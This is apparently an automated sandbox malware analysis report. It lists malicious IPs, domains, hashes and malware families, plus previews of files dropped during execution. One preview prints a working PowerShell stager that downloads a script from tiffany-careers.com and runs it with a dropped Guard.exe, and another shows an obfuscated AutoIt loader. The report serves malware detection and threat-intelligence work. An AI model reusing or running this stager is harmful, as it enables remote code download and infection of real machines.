• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:05:11 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
03:05:17 | API Interceptor | 2x Sleep call for process: svchost.exe modified
03:05:18 | API Interceptor | 1x Sleep call for process: mshta.exe modified
03:05:19 | API Interceptor | 121x Sleep call for process: powershell.exe modified
03:05:36 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified
03:06:20 | API Interceptor | 1582x Sleep call for process: Guard.exe modified
03:06:40 | API Interceptor | 466x Sleep call for process: SwiftWrite.pif modified
09:05:46 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Match | Associated Sample Name / URL | Detection | Threat Name | Context
147.45.49.155 | R8CAg00Db8.lnk | malicious | Unknown | tiffany-careers.com/PefjSkkhb.exe
147.45.49.155 | s4PymYGgSh.lnk | malicious | Unknown | tiffany-careers.com/BFmcYQ.exe
147.45.49.155 | duyba.lnk.download.lnk | malicious | Unknown | tiffany-careers.com/PefjSkkhb.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
tiffany-careers.com | nTyPEbq9wQ.lnk | malicious | Unknown | 147.45.49.155
tiffany-careers.com | 7A2lfjTYNf.lnk | malicious | Unknown | 147.45.49.155
tiffany-careers.com | 6fW0guYpsH.lnk | malicious | Unknown | 147.45.49.155
tiffany-careers.com | FzmtNV0vnG.lnk | malicious | Unknown | 147.45.49.155
tiffany-careers.com | lKin1m7Pf2.lnk | malicious | Unknown | 147.45.49.155
tiffany-careers.com | R4qP4YM0QX.lnk | malicious | Unknown | 147.45.49.155
tiffany-careers.com | R8CAg00Db8.lnk | malicious | Unknown | 147.45.49.155
tiffany-careers.com | s4PymYGgSh.lnk | malicious | Unknown | 147.45.49.155
tiffany-careers.com | duyba.lnk.download.lnk | malicious | Unknown | 147.45.49.155
bg.microsoft.map.fastly.net | A4FY1OA97K.lnk | malicious | DanaBot | 199.232.214.172
bg.microsoft.map.fastly.net | vreFmptfUu.lnk | malicious | DanaBot | 199.232.210.172
bg.microsoft.map.fastly.net | 54861 Proforma Invoice AMC2273745.xlam.xlsx | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | 6ee7HCp9cD.exe | malicious | Quasar | 199.232.214.172
bg.microsoft.map.fastly.net | C8QT9HkXEb.exe | malicious | LummaC | 199.232.210.172
bg.microsoft.map.fastly.net | P9UXlizXVS.exe | malicious | AsyncRAT | 199.232.214.172
bg.microsoft.map.fastly.net | Setup64v4.1.9.exe | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | 0Ty.png.exe | malicious | Xmrig | 199.232.214.172
bg.microsoft.map.fastly.net | 0442.pdf.exe | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | 0442.pdf.exe | malicious | Unknown | 199.232.214.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FREE-NET-ASFREEnetEU | 7ZAg3nl9Fu.exe | malicious | Unknown | 147.45.44.166
FREE-NET-ASFREEnetEU | 7ZAg3nl9Fu.exe | malicious | Unknown | 147.45.44.166
FREE-NET-ASFREEnetEU | HOrW5twCLd.exe | malicious | XenoRAT | 147.45.69.75
FREE-NET-ASFREEnetEU | cMTqzvmx9u.exe | malicious | LummaC, Amadey, LummaC Stealer, RedLine | 147.45.44.224
FREE-NET-ASFREEnetEU | qoqD1RxV0F.exe | malicious | LummaC | 147.45.44.131
FREE-NET-ASFREEnetEU | iviewers.dll | malicious | LummaC | 147.45.44.131
FREE-NET-ASFREEnetEU | Collapse.exe | malicious | LummaC | 147.45.47.81
FREE-NET-ASFREEnetEU | nTyPEbq9wQ.lnk | malicious | Unknown | 147.45.49.155
FREE-NET-ASFREEnetEU | 7A2lfjTYNf.lnk | malicious | Unknown | 147.45.49.155
FREE-NET-ASFREEnetEU | 6fW0guYpsH.lnk | malicious | Unknown | 147.45.49.155
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | A4FY1OA97K.lnk | malicious | DanaBot | 147.45.49.155
3b5074b1b5d032e5620f69f9f700ff0e | vreFmptfUu.lnk | malicious | DanaBot | 147.45.49.155
3b5074b1b5d032e5620f69f9f700ff0e | skript.bat | malicious | Vidar | 147.45.49.155
3b5074b1b5d032e5620f69f9f700ff0e | msgde.exe | malicious | Quasar | 147.45.49.155
3b5074b1b5d032e5620f69f9f700ff0e | 6ee7HCp9cD.exe | malicious | Quasar | 147.45.49.155
3b5074b1b5d032e5620f69f9f700ff0e | https://www.gglusa.us/ | malicious | Unknown | 147.45.49.155
3b5074b1b5d032e5620f69f9f700ff0e | ERTL09tA59.exe | malicious | LummaC | 147.45.49.155
3b5074b1b5d032e5620f69f9f700ff0e | GtEVo1eO2p.exe | malicious | LummaC | 147.45.49.155
3b5074b1b5d032e5620f69f9f700ff0e | TTsfmr1RWm.exe | malicious | LummaC | 147.45.49.155
37f463bf4616ecd445d4a1937da06e19 | InExYnlM0N.lnk | malicious | Unknown | 147.45.49.155
37f463bf4616ecd445d4a1937da06e19 | K9esyY0r4G.lnk | malicious | Unknown | 147.45.49.155
37f463bf4616ecd445d4a1937da06e19 | vreFmptfUu.lnk | malicious | DanaBot | 147.45.49.155
37f463bf4616ecd445d4a1937da06e19 | aD7D9fkpII.exe | malicious | Vidar | 147.45.49.155
37f463bf4616ecd445d4a1937da06e19 | installer.bat | malicious | Vidar | 147.45.49.155
37f463bf4616ecd445d4a1937da06e19 | skript.bat | malicious | Vidar | 147.45.49.155
37f463bf4616ecd445d4a1937da06e19 | din.exe | malicious | Vidar | 147.45.49.155
37f463bf4616ecd445d4a1937da06e19 | yoda.exe | malicious | Vidar | 147.45.49.155
37f463bf4616ecd445d4a1937da06e19 | lem.exe | malicious | Vidar | 147.45.49.155
37f463bf4616ecd445d4a1937da06e19 | markiz.exe | malicious | CredGrabber, Meduza Stealer | 147.45.49.155
                                                     Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                     C:\Users\Public\Guard.exe | nTyPEbq9wQ.lnk | malicious | Unknown
                                                     C:\Users\Public\Guard.exe | 7A2lfjTYNf.lnk | malicious | Unknown
                                                     C:\Users\Public\Guard.exe | 6fW0guYpsH.lnk | malicious | Unknown
                                                     C:\Users\Public\Guard.exe | FzmtNV0vnG.lnk | malicious | Unknown
                                                     C:\Users\Public\Guard.exe | lKin1m7Pf2.lnk | malicious | Unknown
                                                     C:\Users\Public\Guard.exe | R4qP4YM0QX.lnk | malicious | Unknown
                                                     C:\Users\Public\Guard.exe | R8CAg00Db8.lnk | malicious | Unknown
                                                     C:\Users\Public\Guard.exe | s4PymYGgSh.lnk | malicious | Unknown
                                                     C:\Users\Public\Guard.exe | PkContent.exe | malicious | Unknown
                                                     C:\Users\Public\Guard.exe | PkContent.exe | malicious | Unknown
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1310720
                                                                        Entropy (8bit):0.8022201052773588
                                                                        Encrypted:false
                                                                        SSDEEP:1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAQ:RJE+Lfki1GjHwU/+vVhWqpt
                                                                        MD5:E8C93AEAE65CB05FEFDF81985BC61938
                                                                        SHA1:2C150C5F91F01FE9BDCDE56326DE911FCFD2DB8A
                                                                        SHA-256:45D577D755403FBE013404215FAFD41AAAC9F135635E5FF233C95A5AA075EBE2
                                                                        SHA-512:86F27B06E0B6EAEB6D0246B5FF65829BD309B01F67A9CA2570896C2A1ACC599B61C1F6FB5CC5053835182A4A1908C9A7930212BC514FE7931A64D41AE33CA9DB
                                                                        Malicious:false
                                                                         Preview: (binary data; unreadable byte preview omitted)
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0536994b, page size 16384, DirtyShutdown, Windows version 10.0
                                                                        Category:dropped
                                                                        Size (bytes):1048576
                                                                        Entropy (8bit):0.9433464116003822
                                                                        Encrypted:false
                                                                        SSDEEP:1536:DSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:DazaHvxXy2V2UR
                                                                        MD5:E66B2834931E49D0DA4059F7226AB5B7
                                                                        SHA1:A33F88E4B76F0ED1A32366AF15A1310467A342CC
                                                                        SHA-256:BE2A22F407213993369927D9F2424B0FDE7D8C33F17B3CCD022EAC7DB18911D9
                                                                        SHA-512:3F993BE3C39FFDB93C95B9E17EC999B0A8761E47F96C77FBE0AE17E4DD1DDBDD73D242D85E975501FFC6143CD6EC6047284EA16E447372E032DA5D41EF1850E1
                                                                        Malicious:false
                                                                         Preview: (binary data; unreadable byte preview omitted)
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):16384
                                                                        Entropy (8bit):0.08061837448566524
                                                                        Encrypted:false
                                                                        SSDEEP:3:sYeD6tqll/nqlFcl1ZUllllatWa/AllGBnX/l/Tj/k7/t:szD6cll/qlFclQ/lgtWa/A254
                                                                        MD5:E2B7B8C431C4A8B82A01BF1B1F9FB79B
                                                                        SHA1:52F540186A640AF9BBD2DF9D1DA5E1F98841C60C
                                                                        SHA-256:59FF0ACFB2FFF4C262D81718E688BDCEA40F036AFFFF12257D8CE794D44C56D8
                                                                        SHA-512:D48B5FA9FDC908CAB5319857A09A0868056706B39F1C87A775EA04535C015AB522D2A87394BE1DA3D25852CFB233E30D3924630B40AB60CE46CAEE725F6B7573
                                                                        Malicious:false
                                                                         Preview: (binary data; unreadable byte preview omitted)
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):893608
                                                                        Entropy (8bit):6.62028134425878
                                                                        Encrypted:false
                                                                        SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                        MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                        SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                        SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                        SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                        Joe Sandbox View:
                                                                        • Filename: nTyPEbq9wQ.lnk, Detection: malicious, Browse
                                                                        • Filename: 7A2lfjTYNf.lnk, Detection: malicious, Browse
                                                                        • Filename: 6fW0guYpsH.lnk, Detection: malicious, Browse
                                                                        • Filename: FzmtNV0vnG.lnk, Detection: malicious, Browse
                                                                        • Filename: lKin1m7Pf2.lnk, Detection: malicious, Browse
                                                                        • Filename: R4qP4YM0QX.lnk, Detection: malicious, Browse
                                                                        • Filename: R8CAg00Db8.lnk, Detection: malicious, Browse
                                                                        • Filename: s4PymYGgSh.lnk, Detection: malicious, Browse
                                                                        • Filename: PkContent.exe, Detection: malicious, Browse
                                                                        • Filename: PkContent.exe, Detection: malicious, Browse
                                                                         Preview: (PE32 binary starting with the MZ header and DOS stub; unreadable byte preview omitted)
                                                                        Process:C:\Users\user\AppData\Roaming\XKIZdXAs.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):493
                                                                        Entropy (8bit):5.219373319007497
                                                                        Encrypted:false
                                                                        SSDEEP:12:fZ7xFEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:fdxCknZ9LzjYnRSb8Cba
                                                                        MD5:6A07686CA1D212167C47D753146E2147
                                                                        SHA1:854DAFCBEAAB17DF65833F4B517E6A8132A5256C
                                                                        SHA-256:76EC46EDAA320817BC6B5E13161B2F2A0F984061E4C94B5A06D88A00F563BE2A
                                                                        SHA-512:F2F606B3303AD05303E4C0166D4F0F68C74FF71372F3A88CEA6DF515258A22970414421C408853D830B5F09B240C970BE4B30639B55CECA5DD868FFD4570C2C5
                                                                        Malicious:true
                                                                         Preview:
                                                                         [string]$fU5L = "https://tiffany-careers.com/ZxVMIVZIX.txt"
                                                                         [string]$oF6L = "C:\Users\Public\Secure.au3"
                                                                         [string]$exePath = "C:\Users\Public\Guard.exe"

                                                                         # Download the content from the URL
                                                                         $wResp = New-Object System.Net.WebClient
                                                                         $fCont = $wResp.DownloadString($fU5L)

                                                                         # Save the downloaded content to the output file
                                                                         Set-Content -Path $oF6L -Value $fCont -Encoding UTF8

                                                                         # Run the executable with the output file as an argument
                                                                         Start-Process -FilePath $exePath -ArgumentList $oF6L
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                                        Category:dropped
                                                                        Size (bytes):1149415
                                                                        Entropy (8bit):5.199763656099886
                                                                        Encrypted:false
                                                                        SSDEEP:12288:28V+jcfSw6xHpcFTkUCroPzZsc2gmjoiVRS9CyaQZflhM8smx8/d:qcLkpcpLCrOzZTob5JAli1
                                                                        MD5:83D3BBFFAED5F5FAD2D1C3750DCE9E97
                                                                        SHA1:6C94B2ADDC358CFC5B0071727FA9B5FB5F4EFB88
                                                                        SHA-256:9A23CA3C836B127A29112AC64B41072CF13B5C3FEA77E2A5B836514B21D7C95A
                                                                        SHA-512:EE9EEF5CCB1FFB147D500D56C90B280790A661C72A38997C7B516370F2E6ACC9BD829DF9D9959C4AD3E21C5E810BD6816FFC1547D470B72C76F46F6593E3094C
                                                                        Malicious:true
                                                                         Preview:
                                                                         Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines)
                                                                         $PdBlocksResponseDat = '739119618772'
                                                                         $VerifiedUnderstoodValidation = 34
                                                                         $iosymphonyseemscrucial = 50
                                                                         For $OdHBt = 28 To 865
                                                                         If $VerifiedUnderstoodValidation = 32 Then
                                                                         Sqrt(7955)
                                                                         FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3))
                                                                         $VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1
                                                                         EndIf
                                                                         If $VerifiedUnderstoodValidation = 33 Then
                                                                         ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5))
                                                                         DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2))
                                                                         Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1))
                                                                         $VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1
                                                                         EndIf
                                                                         If $VerifiedUnderstoodValidation = 34 Then
                                                                         $NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):291
                                                                        Entropy (8bit):5.194677142755587
                                                                        Encrypted:false
                                                                        SSDEEP:6:DymMBgq2PCHhJ2nKuAl9OmbnIFUt8Wym4hZmw+WymRJzkwOCHhJ2nKuAl9OmbjLJ:XDvBHAahFUt8g4h/+gb56HAaSJ
                                                                        MD5:5CBEF4AE78E6C0843E586112081F9E7F
                                                                        SHA1:2218B3C4527F6EF00EC99C2495B3F2D5461D87B2
                                                                        SHA-256:2E26C426853AE7B3C804D3686A3E54861671B892D44CE56A587CCBA39C8E132C
                                                                        SHA-512:954E2F42084FB478A1182BD9B69D6ED32D2828490EC9A2CEF41D9BBB2A3F25FEED2175802717E4317226CFBB873EA0D18F1FC56BDB75E38E8766AA693E05BE44
                                                                        Malicious:false
                                                                         Preview:
                                                                         2024/12/27-03:05:25.139 db0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001
                                                                         2024/12/27-03:05:25.142 db0 Recovering log #3
                                                                         2024/12/27-03:05:25.143 db0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):291
                                                                        Entropy (8bit):5.194677142755587
                                                                        Encrypted:false
                                                                        SSDEEP:6:DymMBgq2PCHhJ2nKuAl9OmbnIFUt8Wym4hZmw+WymRJzkwOCHhJ2nKuAl9OmbjLJ:XDvBHAahFUt8g4h/+gb56HAaSJ
                                                                        MD5:5CBEF4AE78E6C0843E586112081F9E7F
                                                                        SHA1:2218B3C4527F6EF00EC99C2495B3F2D5461D87B2
                                                                        SHA-256:2E26C426853AE7B3C804D3686A3E54861671B892D44CE56A587CCBA39C8E132C
                                                                        SHA-512:954E2F42084FB478A1182BD9B69D6ED32D2828490EC9A2CEF41D9BBB2A3F25FEED2175802717E4317226CFBB873EA0D18F1FC56BDB75E38E8766AA693E05BE44
                                                                        Malicious:false
                                                                         Preview:
                                                                         2024/12/27-03:05:25.139 db0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001
                                                                         2024/12/27-03:05:25.142 db0 Recovering log #3
                                                                         2024/12/27-03:05:25.143 db0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):338
                                                                        Entropy (8bit):5.205782061355466
                                                                        Encrypted:false
                                                                        SSDEEP:6:Dym8q2PCHhJ2nKuAl9Ombzo2jMGIFUt8WymYfZmw+WymrkwOCHhJ2nKuAl9Ombzz:X8vBHAa8uFUt8gYf/+gr56HAa8RJ
                                                                        MD5:18148EA0533B574EB48294A60A081CB9
                                                                        SHA1:81ACA6845CE00F27943F25F594D45F63E50A1498
                                                                        SHA-256:BE9476A25E9336C6D8BC0139DE1ACA4C8E1BC5FD3116FB63666D357A74340340
                                                                        SHA-512:9D07BF2FCCA929DF738C2C627A90D8D918E6F53D53484CC58317C8408C3E623C305C3F6B34051C0F4C395F2194AF717FA96CCDECE67B93362B6DEC8DA65B84AF
                                                                        Malicious:false
                                                                         Preview:
                                                                         2024/12/27-03:05:25.194 1da4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001
                                                                         2024/12/27-03:05:25.197 1da4 Recovering log #3
                                                                         2024/12/27-03:05:25.198 1da4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):338
                                                                        Entropy (8bit):5.205782061355466
                                                                        Encrypted:false
                                                                        SSDEEP:6:Dym8q2PCHhJ2nKuAl9Ombzo2jMGIFUt8WymYfZmw+WymrkwOCHhJ2nKuAl9Ombzz:X8vBHAa8uFUt8gYf/+gr56HAa8RJ
                                                                        MD5:18148EA0533B574EB48294A60A081CB9
                                                                        SHA1:81ACA6845CE00F27943F25F594D45F63E50A1498
                                                                        SHA-256:BE9476A25E9336C6D8BC0139DE1ACA4C8E1BC5FD3116FB63666D357A74340340
                                                                        SHA-512:9D07BF2FCCA929DF738C2C627A90D8D918E6F53D53484CC58317C8408C3E623C305C3F6B34051C0F4C395F2194AF717FA96CCDECE67B93362B6DEC8DA65B84AF
                                                                        Malicious:false
                                                                         Preview:
                                                                         2024/12/27-03:05:25.194 1da4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001
                                                                         2024/12/27-03:05:25.197 1da4 Recovering log #3
                                                                         2024/12/27-03:05:25.198 1da4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:JSON data
                                                                        Category:modified
                                                                        Size (bytes):475
                                                                        Entropy (8bit):4.956805546735883
                                                                        Encrypted:false
                                                                        SSDEEP:12:YH/um3RA8sqXsBdOg2HMvAcaq3QYiub6P7E4TX:Y2sRdsBdMHO3QYhbS7n7
                                                                        MD5:EA44208546E1A4957EAEA7F44A0FA267
                                                                        SHA1:F57E8EA938752033F53D93F690B86F361EE463D5
                                                                        SHA-256:99E9621971263C3221E29F79EE9592B2535E5495913393F6F8CC99563342F059
                                                                        SHA-512:AEA5CC406FA09A5511A0FFFA7D8B540A2E256B9456606693C91C7D204E842BB74B3EE37831D2D9AF58CC1C39E966A381D51100AD8C8425968D0AC1E25B5C2CC1
                                                                        Malicious:false
                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379846734345703","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":733347},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):475
                                                                        Entropy (8bit):4.963247713778661
                                                                        Encrypted:false
                                                                        SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                        MD5:D46529E824E6E834D0D750C5560C136C
                                                                        SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                        SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                        SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                        Malicious:false
                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):475
                                                                        Entropy (8bit):4.963247713778661
                                                                        Encrypted:false
                                                                        SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                        MD5:D46529E824E6E834D0D750C5560C136C
                                                                        SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                        SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                        SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                        Malicious:false
                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):475
                                                                        Entropy (8bit):4.963247713778661
                                                                        Encrypted:false
                                                                        SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                        MD5:D46529E824E6E834D0D750C5560C136C
                                                                        SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                        SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                        SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                        Malicious:false
                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):3878
                                                                        Entropy (8bit):5.237895754110011
                                                                        Encrypted:false
                                                                        SSDEEP:96:S4bz5vsZ4CzSAsfTxiVud4TxY0CIOr3MCWO3VxBaw+b1bpmuE:S43C4mS7fFi0KFYDjr3LWO3V3aw+b1bS
                                                                        MD5:C7013290A405ECC73D2C6BB1253576DA
                                                                        SHA1:ECCAA58D618907C64B603B281097E3D47C3C6F5F
                                                                        SHA-256:922C8EDEED2D5B2DE5F47D1D483EECCD8C4E7DFFB08F3D57E4638BAA093CA3AF
                                                                        SHA-512:D5DB5F97C2E2B4672D4A2ACED39CAEC654A19E49B9E3E159B2C07C0927AAEA0AE13720B1E5C03A791A95C4C81E892D3DBF2AE3FD6AD0E92C9852D56DCB8AC957
                                                                        Malicious:false
                                                                        Preview:*...#................version.1..namespace-8..|o................next-map-id.1.Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/.0...dr................next-map-id.2.Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.2.$..o................next-map-id.4.Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/.3+...^...............Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/....^...............Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/T.3.a...............Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.U..a...............Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.$..o................next-map-id.5.Pnamespace-c66013b9_73b6_4b3f_b279_
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):326
                                                                        Entropy (8bit):5.216566069790556
                                                                        Encrypted:false
                                                                        SSDEEP:6:DymkFmq2PCHhJ2nKuAl9OmbzNMxIFUt8Wym7oXZmw+Wym+O0kwOCHhJ2nKuAl9Ob:X1vBHAa8jFUt8gUX/+g+O056HAa84J
                                                                        MD5:178EDA9B08FD83DD366A765A7D7AAB06
                                                                        SHA1:D06192DB1A720623742ED0E9E8B2720E08ADF19B
                                                                        SHA-256:B78BCECA29C2BE0D87A5D1536F96BA32219DE592053FED9E78D79B4AB6739EF5
                                                                        SHA-512:E3B9F2C39EE602D676516D7035185967EBE190ED7493C008A2C497616F6886A4E42B115B47FF552053FDFCF30F2614804FF90D47E01D2806682C0AA629248184
                                                                        Malicious:false
                                                                        Preview:2024/12/27-03:05:25.478 1da4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/27-03:05:25.485 1da4 Recovering log #3.2024/12/27-03:05:25.490 1da4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):326
                                                                        Entropy (8bit):5.216566069790556
                                                                        Encrypted:false
